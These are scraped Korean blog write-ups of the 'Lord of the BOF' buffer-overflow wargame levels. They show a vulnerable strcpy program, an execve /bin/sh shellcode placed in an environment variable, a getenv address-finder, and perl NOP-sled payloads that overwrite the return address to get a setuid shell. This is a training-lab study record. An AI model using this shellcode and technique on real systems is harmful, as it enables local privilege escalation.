LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:

MACHTYPE=i386-redhat-linux-gnu

MAIL=/var/spool/mail/cobolt

INPUTRC=/etc/inputrc

BASH_ENV=/home/cobolt/.bashrc

LANG=en_US

DISPLAY=192.168.0.1:0.0

LOGNAME=cobolt

SHLVL=2

USERNAME=

SHELL=/bin/bash

HOSTTYPE=i386

HISTSIZE=1000

OSTYPE=linux-gnu

TERM=xterm

HOME=/home/cobolt

PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/cobolt/bin

COBOLT=j

        X?Rh//shh/bin??S?訴€  //굿

_=/usr/bin/env


/* 3. 환경변수의 주소를 찾습니다 */

[cobolt@localhost cobolt]$ vi getenv.c

[cobolt@localhost cobolt]$ cat getenv.c

#include <stdio.h>

int main(int argc, char *argv[]){

printf("%p\n",getenv(argv[1]));

return 0;

}

[cobolt@localhost cobolt]$ gcc getenv.c -o getenv

[cobolt@localhost cobolt]$ ./getenv COBOLT

0xbfffffd0  //주소

[cobolt@localhost cobolt]$ (perl -e 'print "\x90"x20, "\xd0\xff\xff\xbf"';cat)|./goblin 

/*stdin을 공격할 수 있게 만드는(?) 코드를 추가시킵니다.*/

my-pass

?????????????????????퓅y-pass

my-pass

euid = 503


처음에는 그냥 전 단계같이 환경변수만 넣었더니 안되더라구요. 그래서 구글링하다가 stdin을 공격하는 코드중 cat가 있어 넣어봤습니다. 그래도 안되서 아는형께 물어보니 파이프를 사용해 넣는거라서 앞의 $표시는 필요없다고 해요. 


이번에 배운것:

-cat를 사용할땐 앞에 달러표시를 지운다

-달러표시는 커맨드라인으로 넘겨줄때, 파이프는 괄호만

-환경변수의 주소를 알아낼때, 환경변수가 프로그램에 밀리므로 나오는 주소가 프로그램명에 따라 다르다

-xshell♥


노트쓴건 없네요.. 딱히..


반응형

'STUDY > Lord of the BOF' 카테고리의 다른 글

wolfman->darkelf  (0) 2013.11.21
orc->wolfman  (0) 2013.11.21
goblin->orc  (0) 2013.11.20
gremlin->cobolt  (0) 2013.10.30
gate->gremlin  (0) 2013.10.27
반응형

/* 1. gremlin으로 로그인 하고 난 뒤 내용물을 봅시다.*/

[gremlin@localhost gremlin]$ ls -al

total 156

drwx------    2 gremlin  gremlin      4096 Oct 26 16:06 .

drwxr-xr-x   25 root     root         4096 Mar 30  2010 ..

-rw-------    1 gremlin  gremlin      8903 Oct 26 11:39 .bash_history

-rw-r--r--    1 gremlin  gremlin        24 Feb 26  2010 .bash_logout

-rw-r--r--    1 gremlin  gremlin       230 Feb 26  2010 .bash_profile

-rw-r--r--    1 gremlin  gremlin       124 Feb 26  2010 .bashrc

-rwxr-xr-x    1 gremlin  gremlin       333 Feb 26  2010 .emacs

-rw-r--r--    1 gremlin  gremlin      3394 Feb 26  2010 .screenrc

-rwxrwxr-x    1 gremlin  gremlin     11883 Oct 26 03:31 a.out

-rw-rw-r--    1 gremlin  gremlin       291 Oct 25 22:40 cobalt.c

-rwsr-sr-x    1 cobolt   cobolt      11970 Feb 26  2010 cobolt

-rw-r--r--    1 gremlin  gremlin       291 Mar 29  2010 cobolt.c

-rw-------    1 gremlin  gremlin     61440 Oct 25 22:41 core

-rwxrwxr-x    1 gremlin  gremlin     11842 Oct 26 16:06 getenv

-rw-rw-r--    1 gremlin  gremlin        97 Oct 26 16:05 getenv.c

-rw-rw-r--    1 gremlin  gremlin       143 Oct 26 03:31 whereis.c


COBOLT:

[gremlin@localhost gremlin]$ cat cobolt.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - cobolt

        - small buffer

*/


int main(int argc, char *argv[])

{

    char buffer[16];

    if(argc < 2){

        printf("argv error\n");

        exit(0);

    }

    strcpy(buffer, argv[1]);

    printf("%s\n", buffer);

}

/*버퍼가 작습니다. 여기서 메모리는 '버퍼 16바이트, sfp 4바이트, 리턴어드레스 4바이트'로 이루어져있다고 가정할수 있습니다.*/


/* 2. export명령어로 환경변수를 만듭니다. 여기서 print문도 꼭 포함하셔야 합니다*/

[gremlin@localhost gremlin]$ export GREMLIN=`perl -e 'print"\x6a\x0b\x58\x99\x5

2\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`


/* 3. env명령어로 환경변수가 잘 들어갔는지 봅니다.*/

[gremlin@localhost gremlin]$ env

PWD=/home/gremlin

REMOTEHOST=192.168.0.1

HOSTNAME=localhost.localdomain

LESSOPEN=|/usr/bin/lesspipe.sh %s

USER=gremlin

LS_COLORS=

MACHTYPE=i386-redhat-linux-gnu

MAIL=/var/spool/mail/gremlin

INPUTRC=/etc/inputrc

BASH_ENV=/home/gremlin/.bashrc

GREMLIN=j

         X셊h//shh/bin됥RS됣?  //굿

LANG=en_US

LOGNAME=gremlin

SHLVL=2

USERNAME=

SHELL=/bin/bash

HOSTTYPE=i386

HISTSIZE=1000

OSTYPE=linux-gnu

TERM=ansi

HOME=/home/gremlin

PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/gremlin/bin

COBOLT=j

        X셊h//shh/bin됥RS됣?

_=/usr/bin/env


/* 4. 환경변수의 주소를 알아냅니다.*/

[gremlin@localhost gremlin]$ cat getenv.c

#include <stdio.h>

int main(int argc, char *argv[]){

printf("%p\n",getenv(argv[1]));

return 0;

}

[gremlin@localhost gremlin]$ ./getenv GREMLIN

0xbffffee7 //이게 리턴어드레스가 됩니다


/* 5. 필요한 양의 nop를 넣고 리턴어드레스를 넣습니다.*/

[gremlin@localhost gremlin]$ ./cobolt `perl -e 'print"\x90"x20, "\xe7\xfe\xff\x

bf"'`

릱릱릱릱릱릱릱릱릱릱澳

풺ash$ my-pass


역시 이번에도 달고나 문서가 많은 도움이 되었습니다.

기본은 조금씩 감이 잡히네요. 그래서 그런지 지난번보다는 덜 헤맨것같아요.


NOTES:

GREMLIN=  0xbffffee7

"\xe7\xfe\xff\xbf"'`

buffer=16

nop 20, ret 4


반응형

'STUDY > Lord of the BOF' 카테고리의 다른 글

wolfman->darkelf  (0) 2013.11.21
orc->wolfman  (0) 2013.11.21
goblin->orc  (0) 2013.11.20
cobolt->goblin  (0) 2013.11.01
gate->gremlin  (0) 2013.10.27
반응형

LoB를 풀으시기 전에 꼭 이 링크로 들어가 버퍼오버플로우 문서를 꼭 읽으시기 바랍니다. 엄청난 도움을 주거든요.

http://wowhacker.com/board.php?bid=174&bs_type=&bs_str=&cate=0&pg=0&mode=view&uid=154748


   LoB 설명/파일 받는곳


그럼, 바로 풀이해보겠습니다.



gate로 로그인 한 후에, ls -al을 하니 파일들이 보입니다. (a.out 과 gramlin.c는 무시하셔도 됩니다)

우선 레벨 이름이 gremlin이니 gremlin.c를 구경해보겠습니다.

달고나 문서를 열심히 보셨다면 낯익으실겁니다. 66쪽쯤을 참고하였는데요, 

버퍼는 256바이트이고, 더미는 없으니 바로 sfp 4바이트와 리턴어드레스 4바이트가 있을테니 260바이트를 쉘코드와 NOP로 채우고, 리턴어드레스를 넣는 방법을 시도했습니다.

(쉘코드는 제가 작성하지 않았습니다)


 


릱릱! 이게 쉘코드를 땄을때의 화면입니다.

저는 펄로 했지만 파이썬도 똑같아요 -e 대신 -c를 사용하고, 곱셈부호대신 *를 사용하고, 쉽표대신 +를 쓴다는게 다르지만..

모두들 재밌는 lob하십쇼ㅋㅋ


풀이중 제가 적은 노트:

Shellcode=23 bytes

그러므로 NOP는 237bytes

esp=0xbffffd7c

"\x7c\xfd\xff\xbf"


반응형

'STUDY > Lord of the BOF' 카테고리의 다른 글

wolfman->darkelf  (0) 2013.11.21
orc->wolfman  (0) 2013.11.21
goblin->orc  (0) 2013.11.20
cobolt->goblin  (0) 2013.11.01
gremlin->cobolt  (0) 2013.10.30

+ Recent posts